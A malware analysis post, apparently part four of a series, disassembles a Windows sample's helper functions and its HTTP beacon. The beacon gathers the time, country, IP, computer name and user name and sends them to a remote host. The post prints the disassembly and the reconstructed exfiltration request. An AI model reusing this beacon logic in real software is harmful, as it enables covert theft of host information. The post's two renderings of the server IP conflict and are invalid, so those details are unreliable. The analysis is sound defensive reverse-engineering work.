Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part three started disassembling the functions to see how closely their behaviour matched the predictions in part two, but sadly ended just as things were getting exciting. In part four, the saga continues.
Part three disassembled the _WinMain@16() function and saw that it called two other malware functions: sub_401eb0(), which downloaded a file before running it with CreateProcess(); and sub_401c40() which part three didn’t disassemble as it was getting quite long.
Continuing on then, by looking at three small ‘utility’ functions which are called by function sub_401c40(); and then at sub_401c40() itself. I’ll look at the utility functions first so that they don’t interrupt the flow of function sub_401c40()‘s analysis.
sub_401a70() referenced the following string:
It uses the GetLocalTime() Win32 function which stores the local time in to a SystemTime structure. It then proceeds to extract the seconds, minutes, hour, date, month, and year from the SystemTime structure and pushes them on to the stack in that order. It then uses one of the format strings that we identified back in parts one and two, with _sprintf() to format the time information according to the format string above:
.text:00401AC2 push offset a04d02d02d02d02 ; "%04d%02d%02d%02d%02d%02d" .text:00401AC7 push ecx ; char * .text:00401AC8 call _sprintf
The ecx register has been loaded with the address that was passed as a parameter to sub_401a70(). The purpose of sub_401a70() then, is to return the local time, in the format ‘yyyyMMddhhmmss’ (year, month, date, hour, minutes, seconds). Basically it answers the question “What’s the time Mr. Wolf?”
sub_402090() didn’t reference any strings, but it is called from sub_401c40() and so we’ll have a quick look at it. It calls gethostname() to obtain the local host’s host name. If this fails, sub_402090() returns 0.
Next up, in an interesting turn of events, it calls gethostbyname() to resolve the host name it just received to an IP address. After writing C code myself to determine the local host’s IP address, I suspect that the malware is using the combination of gethostname() and gethostbyname() as an easier alternative to calling GetAdaptersAddresses() and wading through its output. If gethostbyname() fails, sub_402090() returns 0.
sub_402090() then takes the first IP address returned (or returns 1 itself if there wasn’t one) by gethostbyname() and passes it to inet_ntoa() to convert the four byte IP address in to a string (in the familiar dotted quad notation). It copies this IP address string in to the buffer passed as the first parameter to sub_402090(), and then returns 1.
It looks like sub_402090() is using gethostname(), followed by gethostbyname() to determine the local host’s IP address, and then calling inet_ntoa() to convert it to a string (the familiar dotted quad notation) — just the kind of thing that would make it easy to send in an HTTP query string.
If I remember rightly, and I often don’t as I’m getting older so excuse me a moment while I look it up, sub_402100() was a function that only referenced a couple of short strings:
I suspected that this function may use those format strings in an sprintf() call to append two strings in a HTTP URL (as ‘%20’ is how a space character is encoded in URLs). This turned out to be incorrect, so let’s see what sub_402100() actually does.
.text:00402100 String2 = byte ptr -0C00h .text:00402100 String1 = byte ptr -800h .text:00402100 var_400 = dword ptr -400h .text:00402100 lpString1 = dword ptr 4
This list, generated by IDA Pro, is suggesting that sub_402100() has three local variables (two strings, String1 and String2; and an unknown variable, var_400), and one parameter (lpString1) which is a pointer to a string.
The local variables are identified by the negative offsets in the above code, and the parameter by its positive offset. These offsets are typically offsets from either the stack pointer (esp register), as they are in this case, or from the frame pointer (ebp register).
After initialising some variables, it runs the following:
.text:00402126 mov eax, [esp+0C10h+lpString1] .text:0040212D lea ecx, [esp+0C10h+String2] .text:00402131 push eax ; lpString2 .text:00402132 push ecx ; lpString1 .text:00402133 call ebp ; lstrcpyA
This block of instructions is using lstrcpy() to copy the ASCII string passed as a parameter (lpString1) to String2. A trailing ‘A’ is usually used in function names to indicate that the function operates on ASCII strings, rather than on Unicode (indicated by a trailing ‘W’) strings. This is something which until now, I have neglected to point out.
It gets a bit confusing because the comments added by IDA Pro are saying that ecx and eax are the lpString1 and lpString2 parameters to lstrcpyA(), as opposed to the String1, String2, and lpString1 variables that it defined previously.
If you read the instructions, you’ll see that eax contains the first parameter (that is the variable that IDA Pro previously identified as lpString1), and that ecx contains the address of (because of the use of the lea instruction, rather than the mov instruction) String2.
So, after all that, that block of code copies the string passed as a parameter, in to the local String2 variable.
.text:00402135 lea edx, [esp+0C10h+String2] .text:00402139 push 20h ; int .text:0040213B push edx ; char * .text:0040213C call _strchr .text:00402141 mov esi, eax
It then calls the _strchr() function to search for the character with ASCII code 0x20 (which is a space character), in the string String2. Or, if you’d rather have that in English, it searches for a space in the string that was passed to it.
If it doesn’t find a space, it jumps down to the end of the function where it copies String2 back in to the buffer (string) that was passed to it as an argument, and returns. Hey, does this string make my buffer look big?
If it did find a space, it zeros the String1 and var_400 variables using repeat prefixes and store string instructions.
.text:00402182 lea eax, [esp+0C10h+String2] .text:00402186 lea ecx, [esp+0C10h+String1] .text:0040218D push eax ; lpString2 .text:0040218E push ecx ; lpString1 .text:0040218F mov [esi], bl .text:00402191 call ebp ; lstrcpyA
This time, the IDA Pro provided comments are correct. This block of code is using lstrcpy() to copy the ASCII string String2 to String1.
Believe it or not, the instruction at 0x40218f didn’t just wonder in from the street, but is actually serving a purpose. The ebx register was set to zero using an ‘xor ebx,ebx’ instruction near the beginning of the function, and the bl register is the lower eight bits of the ebx register, hence it is also 0.
The return value from _strchr(), that is the address where the character was found, was saved in to the esi register immediately after the call to _strchr(). Hence the instruction at address 0x40218f is copying a null byte over the top of the space character that _strchr() found in String2. That is, it is terminating String2 at the first space character.
Excuse me a moment while I check how much is left of this function, as it is tea time and I’m getting hungry.
.text:00402193 lea edx, [esp+0C10h+String1] .text:0040219A push offset a20 ; "%20" .text:0040219F push edx ; lpString1 .text:004021A0 call ds:lstrcatA
Right, sub_402100() then appends the string “%20” to the end of the local variable String1. The IDA Pro comment is saying that edx is the lpString1 parameter to lstrcat(), and not the lpString1 parameter passed as an argument to sub_402100(). This is why it is a good idea to give the generically named variables a more meaningful name once you figure out their purpose.
.text:004021A6 inc esi .text:004021A7 lea eax, [esp+0C10h+var_400] .text:004021AE push esi ; lpString2 .text:004021AF push eax ; lpString1 .text:004021B0 call ebp ; lstrcpyA
The next block of code increments the esi register which, if you remember, was pointing to the address of the space character in String2. This character is now a null byte, so the inc instruction increments it such that it now points to the first character after the space character (or what is now the null byte) in String2.
It then uses lstrcpy() to copy from this post-space/post-null byte character, in to the local variable var_400. The net effect of this is that it has broken the input string in to two parts — the part before the first space character, which is now in String1 with the string ‘%20’ on the end of it, and the part after the first space character, which is now in var_400.
.text:004021B2 mov ecx, 100h .text:004021B7 xor eax, eax .text:004021B9 lea edi, [esp+0C10h+String2] .text:004021BD lea edx, [esp+0C10h+String1] .text:004021C4 rep stosd .text:004021C6 lea ecx, [esp+0C10h+var_400] .text:004021CD lea eax, [esp+0C10h+String2] .text:004021D1 push ecx .text:004021D2 push edx .text:004021D3 push offset aSS ; "%s%s" .text:004021D8 push eax ; char * .text:004021D9 call _sprintf
sub_402100() then uses a ‘rep stosd’ instruction to zero String2, before using _sprintf() and our good old ‘%s%s’ format string, to basically append the string in var_400 to the string in String1, and store the result in String2.
What this function has done, then, is search through the string that it is given, look for a space, and replace it with ‘%20’. ‘%20’ is how a space character is encoded in HTTP URLs… but wait, there’s more:
.text:004021DE lea ecx, [esp+0C20h+String2] .text:004021E2 push 20h ; int .text:004021E4 push ecx ; char * .text:004021E5 call _strchr .text:004021EA mov esi, eax .text:004021EC add esp, 18h .text:004021EF cmp esi, ebx .text:004021F1 jnz loc_40214E
It then calls _strchr() again to search for another space character in String2 and, if it finds one, jumps back to address 0x40214e to replace it with a ‘%20’. If it doesn’t find one, then we have the grand finale (I always thought that ‘finale’ should have an accent, but apparently not):
.text:004021F7 mov eax, [esp+0C10h+lpString1] .text:004021FE lea edx, [esp+0C10h+String2] .text:00402202 push edx ; lpString2 .text:00402203 push eax ; lpString1 .text:00402204 call ebp ; lstrcpyA
It copies String2 back to the string that was passed in to the function — that is, it overwrites the original string. I told you it was ‘grand’.
Now that we know that function sub_402100() searches through the input string and replaces each occurrence of a space character with the string ‘%20’, I can have some dinner and finish off the star of this article, sub_401c40(), tomorrow.
As much as I’d like to finish it tonight, I have to be up at 04:30 in the morning — the early morning starts required for hot air ballooning here (at least if you want to be able to maintain what little control you have in a balloon), really don’t mix well with spending late nights wading through assembly language code and playing with I.T. stuff.
sub_401c40() starts off by initialising variables, before calling socket() to obtain an AF_INET (Internet address family, IPv4) SOCK_STREAM socket. The protocol is unspecified, which usually only leaves TCP as a protocol option in this case, but technically this could include SCTP.
If the socket() call returns -1 (to indicate an error), sub_401c40() returns 0.
.text:00401D0A push 80 ; hostshort .text:00401D0C mov [esp+0C38h+name.sa_family], AF_INET .text:00401D13 call htons .text:00401D18 push offset cp ; "522.214.171.124" .text:00401D1D mov word ptr [esp+0C38h+name.sa_data], ax .text:00401D22 call inet_addr
Here we see the malware calling htons() to convert 80 from host byte order (little endian on Intel 80×86 processors) to network byte order (big endian), before using the IP address string that we previously identified.
The IP address string is passed to the inet_addr() function to convert it from a string in to four bytes in network byte order, as they would appear in the header of an IP packet.
Scattered in amongst this code fragment, you see it setting name.sa_family to AF_INET, and name.sa_data to the contents of the ax register. Those of you who have done network programming may recognise these as being elements of a sockaddr structure.
Those two lines are initialising the address family to be AF_INET (Internet, that is IPv4), and the port (the first two bytes of sa_data when the address family is AF_INET) to be the value returned by htons(), that is, 80 in network byte order. 80/tcp (SOCK_STREAM socket type) is the well known port for HTTP, that is, web servers.
.text:00401D27 lea ecx, [esp+0C34h+name]
.text:00401D2B push 10h ; namelen
.text:00401D2D push ecx ; name
.text:00401D2E push esi ; s
.text:00401D2F mov dword ptr [esp+0C40h+name.sa_data+2], eax
.text:00401D33 call connect
There we have a connect() call — didn’t see that coming. The malware is building a sockaddr_in structure (sockaddr structure for the IPv4 address family) with a port number of 80. The return value from inet_addr(), which is still in the eax register, is placed at offset 2 of sockaddr.sa_data, that is sockaddr_in.sin_addr.
The connect() call will hence connect to the remote host, 5126.96.36.199, on port 80/tcp. If the connect call fails, it calls closesocket() and returns 0, otherwise, it calls sub_401a70() which as we’ve seen, returns the local time in ‘yyyyMMddhhmmss’ format (year, month, date, hour, minutes, seconds).
Rightio, this is where we get to confirm that data is leaked, and to see what data is leaked.
.text:00401D4F lea edx, [esp+0C34h+dst] .text:00401D56 push edx ; dst .text:00401D57 call sub_401a70
At this point, sub_401c40() starts gathering data. Here you can see it calling sub_401a70() with the address of (it’s an lea instruction not a mov instruction) the dst variable. As we have seen, this will return with the current time (yyyyMMddhhmmss) in the dst variable.
.text:00401D5F lea eax, [esp+0C34h+LCData] .text:00401D66 push edi ; cchData .text:00401D67 push eax ; lpLCData .text:00401D68 push LOCALE_SENGCOUNTRY ; LCType .text:00401D6D push LOCALE_SYSTEM_DEFAULT ; Locale .text:00401D72 call ds:GetLocaleInfoA
Now it is calling GetLocaleInfo() with its LCType parameter set to LOCALE_SENGCOUNTRY, to find out what the full English name of the country/region is.
.text:00401D78 lea ecx, [esp+0C34h+nSize] .text:00401D7C lea edx, [esp+0C34h+Buffer] .text:00401D80 push ecx ; nSize .text:00401D81 push edx ; lpBuffer .text:00401D82 call ds:GetComputerNameA
Reasonably self-explanatory. This will put the computer name in to the variable Buffer, which is nSize bytes large.
.text:00401D88 lea eax, [esp+0C34h+stAddrStr] .text:00401D8C push eax ; lpstAddrStr .text:00401D8D call sub_402090
It then calls sub_402090() which obtains the computer’s IP address by using gethostname() to obtain its host name, and then resolving that to an IP address using gethostbyname().
.text:00401D95 test eax, eax .text:00401D97 jnz short loc_401DA9 .text:00401D99 lea ecx, [esp+0C34h+stAddrStr] .text:00401D9D push offset aNone ; "NONE" .text:00401DA2 push ecx ; lpString1 .text:00401DA3 call ds:lstrcpyA
If sub_402090() returned 0, then it copies the string “NONE” in to stAddrStr in place of the IP address.
.text:00401DA9 lea edx, [esp+0C34h+nSize] .text:00401DAD lea eax, [esp+0C34h+var_A00] .text:00401DB4 push edx ; nSize .text:00401DB5 push eax ; lpBuffer .text:00401DB6 mov [esp+0C3Ch+nSize], edi .text:00401DBA call ds:GetUserNameA
Looks like it’s going to leak the current user’s user name too, as this code fragment is storing it in to var_A00.
The malware then uses ‘rep stosd’ followed by ‘stosw’ to zero a local variable.
.text:00401DD9 lea ecx, [esp+0C34h+buf] .text:00401DE0 push offset aGetUpdataTpdb_ ; "GET /updata/TPDB.php?" .text:00401DE5 push ecx ; char * .text:00401DE6 stosb .text:00401DE7 call _sprintf
Here we can see another of the strings being used. Given that we have just seen it connect to a remote host on port 80/tcp (well known port for HTTP), and that the string looks like a HTTP request, it is probably pretty safe to assume that it is now putting a HTTP request together.
The stosb instruction is part of the previous rep stosd/stosw code to zero a local variable. Compilers often interleave bits of code for performance reasons (CPU instruction pipelining for instance, where two or more independent instructions run in parallel).
.text:00401DEC mov edx, [esp+0C3Ch+arg_0] .text:00401DF3 lea eax, [esp+0C3Ch+var_A00] .text:00401DFA push edx .text:00401DFB lea ecx, [esp+0C40h+Buffer] .text:00401DFF push eax .text:00401E00 lea edx, [esp+0C44h+stAddrStr] .text:00401E04 push ecx .text:00401E05 lea eax, [esp+0C48h+LCData] .text:00401E0C push edx .text:00401E0D lea ecx, [esp+0C4Ch+dst] .text:00401E14 push eax .text:00401E15 push ecx .text:00401E16 push offset a1_003 ; "1.003" .text:00401E1B lea edx, [esp+0C58h+String2] .text:00401E22 push offset aLg1SLg2SLg3S_0 ; "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d" .text:00401E27 push edx ; char * .text:00401E28 call _sprintf
That big lump of code is just pushing the variables for the _sprintf() call on to the stack. This is where you get to work back to see what data is included in the HTTP query string (and hence leaked). This tells us that the query string will be (with the variable names in angled brackets):
_sprintf() will store the resulting string in String2 (it’s first parameter). I’ll recap what data is contained in those variables later as part of the full HTTP request.
.text:00401E2D lea eax, [esp+0C60h+String2] .text:00401E34 push eax ; lpString1 .text:00401E35 call sub_402100
Here it calls sub_402100() which, as we’ve seen, will percent encode any spaces in the String2 string.
.text:00401E3A mov edi, ds:lstrcatA
.text:00401E40 add esp, 30h
.text:00401E43 lea ecx, [esp+0C34h+String2]
.text:00401E4A push offset String2 ; ” HTTP/1.1\r\nHost: [censored].jp\r\n\r\n”
.text:00401E4F push ecx ; lpString1
.text:00401E50 call edi ; lstrcatA
sub_401c40() then uses lstrcat() to add the protocol version to the request, and to also add a HTTP ‘Host:’ request header. The trailing ‘\r\n\r\n’ represents two new line sequences, which adds one blank line, which in turn signifies the end of the HTTP request headers. Hang in there — we’re almost at the end.
Notice that the preceding block of code has two String2s. The first is a variable, as indicated by the use of an offset from the esp register. The second is a string constant, as indicated by IDA Pro referencing it as ‘offset String2’ and commenting the instruction with the string’s value.
.text:00401E52 lea edx, [esp+0C34h+String2]
.text:00401E59 lea eax, [esp+0C34h+buf]
.text:00401E60 push edx ; lpString2
.text:00401E61 push eax ; lpString1
.text:00401E62 call edi ; lstrcatA
buf contains the start of the HTTP request (‘GET …’), and the variable String2 contains the query string and the rest of the HTTP request. This lstrcat() call will append the variable String2 to buf, thus leaving a complete HTTP request (with headers) in buf.
sub_401c40() then calculates the length of the data in buf (the complete HTTP request) and passes it, along with buf itself, to send() to send it to the remote host. It then calls closesocket() and returns 1 if the send() call succeeded, or 0 if it failed (send() returned -1). This also tells us that it is not expecting to receive any information back from the remote host and that this is simply a request to leak information and possibly to notify of infection.
Well that certainly wasn’t short, but we now know what another four functions do:
Returns the local time in yyyyMMddhhmmss format.
Returns the local host’s IP address as a string.
Takes a string and percent encodes any spaces in it.
Issues a HTTP request to send information about the infected host.
sub_401c40() sends the following HTTP request:
GET /updata/TPDB.php?lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<ipaddrstr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg0> HTTP/1.1 Host: [censored].jp
- 1.003 looks like a version number
- <dst> is the local time stamp
- <LCData> is the English name of the country/region from the default locale settings
- <ipaddrstr> is the host’s IP address
- <Buffer> is the host’s computer name as reported by GetComputerName()
- <var_A00> is the user name of the currently logged in user
- <arg0> is the argument passed to sub_401c40()
The query format string is telling us that this is an integer (the ‘%d’). Going back to the code, sub_401c40() is passed the return value from sub_401eb0(). In part three, we saw that this indicates whether or not the CreateProcess() call created the ACCl3.jpg process.
Just quickly, there was one other function which referenced those strings, but which I haven’t covered: sub_401ae0(). Just looking at it quickly, it appears to be the same as sub_401c40() only it takes the values for query string variables lg1 – lg6 as arguments, and omits lg7. This could be used as a beacon from one of the 100 threads that are started.
The next part will look at some of the remaining functions, although I’m starting to think it won’t go in to as much detail! The remaining functions should be a tad more exciting, as they will be functions that are called from the thread function which starts running after infection.